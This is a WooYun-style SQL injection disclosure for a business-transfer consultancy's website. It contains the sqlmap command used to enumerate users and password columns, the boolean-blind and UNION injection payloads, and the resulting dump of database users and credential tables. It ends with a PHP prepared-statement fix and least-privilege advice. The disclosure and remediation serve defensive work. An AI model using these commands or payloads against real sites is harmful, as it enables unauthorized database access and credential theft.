WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
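2015-11-25: Details reported to the vendor; awaiting vendor response
2015-11-30: Vendor confirmed; details disclosed to the vendor only
2015-12-10: Details disclosed to core white hats and experts in related fields
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to intern white hats
2016-01-14: Details disclosed to the public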
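普斯匯達顧問有限公司 is a member of the 普斯 group (普斯集團). Its main services are business transfers, franchising, mergers and acquisitions, entrepreneurship training courses, start-up consulting, marketing planning, and brand image planning. We are committed to becoming a highly efficient business platform and to providing customers with quality service. 普斯匯達顧問有限公司 has professional business consultants, including professional accountants, auditors and lawyers, with extensive experience in the process and details of business transfer transactions. It provides extensive free professional advice and support before and after a transaction, from finding buyers or sellers and valuing the business through to completion of the deal, helping customers realise their entrepreneurial ambitions. The fast, reliable service and professional team spirit of 「普斯匯達」 assist buyers and sellers in negotiations, ensure that every stage of the transaction and the subsequent integration or handover plan is completed smoothly, and ensure that the transaction process remains strictly confidential.
URL: http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key=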
$ python sqlmap.py -u "http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key=" -p id --technique=BU --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
Database: dbh232120
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| tbl_email_opportunities | 32076   |
+-------------------------+---------+

Database: dbh232120
Table: tbl_email_opportunities
[33 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| active           | tinyint(4)   |
| address2         | varchar(200) |
| agreement        | tinyint(1)   |
| asking_price     | varchar(20)  |
| Assets           | text         |
| b_item           | int(11)      |
| code             | varchar(255) |
| create_by        | bigint(20)   |
| create_date      | datetime     |
| deleted          | tinyint(4)   |
| desc_1           | text         |
| desc_2           | text         |
| desc_3           | text         |
| Followed1_By     | bigint(20)   |
| hot_item         | int(11)      |
| id               | bigint(20)   |
| Internal_Remarks | text         |
| intro_1          | varchar(255) |
| intro_2          | varchar(255) |
| intro_3          | varchar(255) |
| investment       | double       |
| investment_desc  | varchar(30)  |
| marked           | tinyint(4)   |
| modify_by        | bigint(20)   |
| modify_date      | datetime     |
| new_item         | int(11)      |
| ranking          | char(1)      |
| shop_company     | varchar(100) |
| sold             | tinyint(1)   |
| status           | tinyint(4)   |
| whether1         | tinyint(1)   |
| whether2         | tinyint(1)   |
| whether3         | tinyint(1)   |
+------------------+--------------+
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87 AND 8143=8143&pg_num=&search_key=

    Type: UNION query
    Title: MySQL UNION query (58) - 14 columns
    Payload: id=-5811 UNION ALL SELECT 58,58,58,58,CONCAT(0x7178627171,0x554c625470547a786d765441444a6b51556d514379614d54734d665768666d457344766d6b764373,0x7170707871),58,58,58,58,58,58,58,58,58#&pg_num=&search_key=
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
current user: 'h232120b@localhost'
current user is DBA: False
database management system users [5]:
[*] 'h232120b'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[*] 'trde'@'localhost'

columns LIKE 'pass' were found in the following databases:
Database: hkmortgage
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+

Database: dbh232120
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+

Database: tradeasy
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+

Database: 123
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+

Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+

Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(64) |
+----------+----------+
Deploy a WAF.
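The code-level fix for the `id` parameter reported above, as an added example that is not part of the original report or the vendor's code: the value is allow-listed as an integer and bound to a prepared statement. The table columns, the in-memory SQLite stand-in for the MySQL backend, and the sample rows are assumptions constructed for the demonstration.

```php
<?php
// Added example, not the vendor's code. Table and column names are assumptions;
// an in-memory SQLite table with constructed rows stands in for the MySQL backend.

// Pattern consistent with the sqlmap result (assumed, shown only for contrast):
//   $sql = "SELECT * FROM tbl_news_press WHERE id = " . $_GET['id'];
// With that, "87 AND 8143=8143" is parsed as SQL rather than as a value.

function fetch_news_item(PDO $pdo, $rawId)
{
    // 1. Allow-list the input: a positive integer or nothing.
    $id = filter_var($rawId, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false || $id === null) {
        return null;
    }
    // 2. Bind the value; the query text never contains request data.
    $stmt = $pdo->prepare('SELECT id, title FROM tbl_news_press WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE tbl_news_press (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO tbl_news_press VALUES (87, 'constructed sample row')");

// Constructed inputs: one legitimate id and the two payload shapes from the report.
$inputs = array(
    '87',
    '87 AND 8143=8143',
    '-5811 UNION ALL SELECT 58,58,58,58#',
    array('87'),   // id[]=87 arrives as an array
);
foreach ($inputs as $raw) {
    $row = fetch_news_item($pdo, $raw);
    printf("%-40s => %s\n", json_encode($raw), $row ? 'row ' . $row['id'] : 'rejected');
}
```

Against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the driver sends real prepared statements. The sqlmap output shows the web account could read `mysql.user` and several other databases, so limiting that account's grants to the one schema the site needs reduces what any remaining injection can reach.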
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-11-30 14:44
Referred to related parties.
None yet.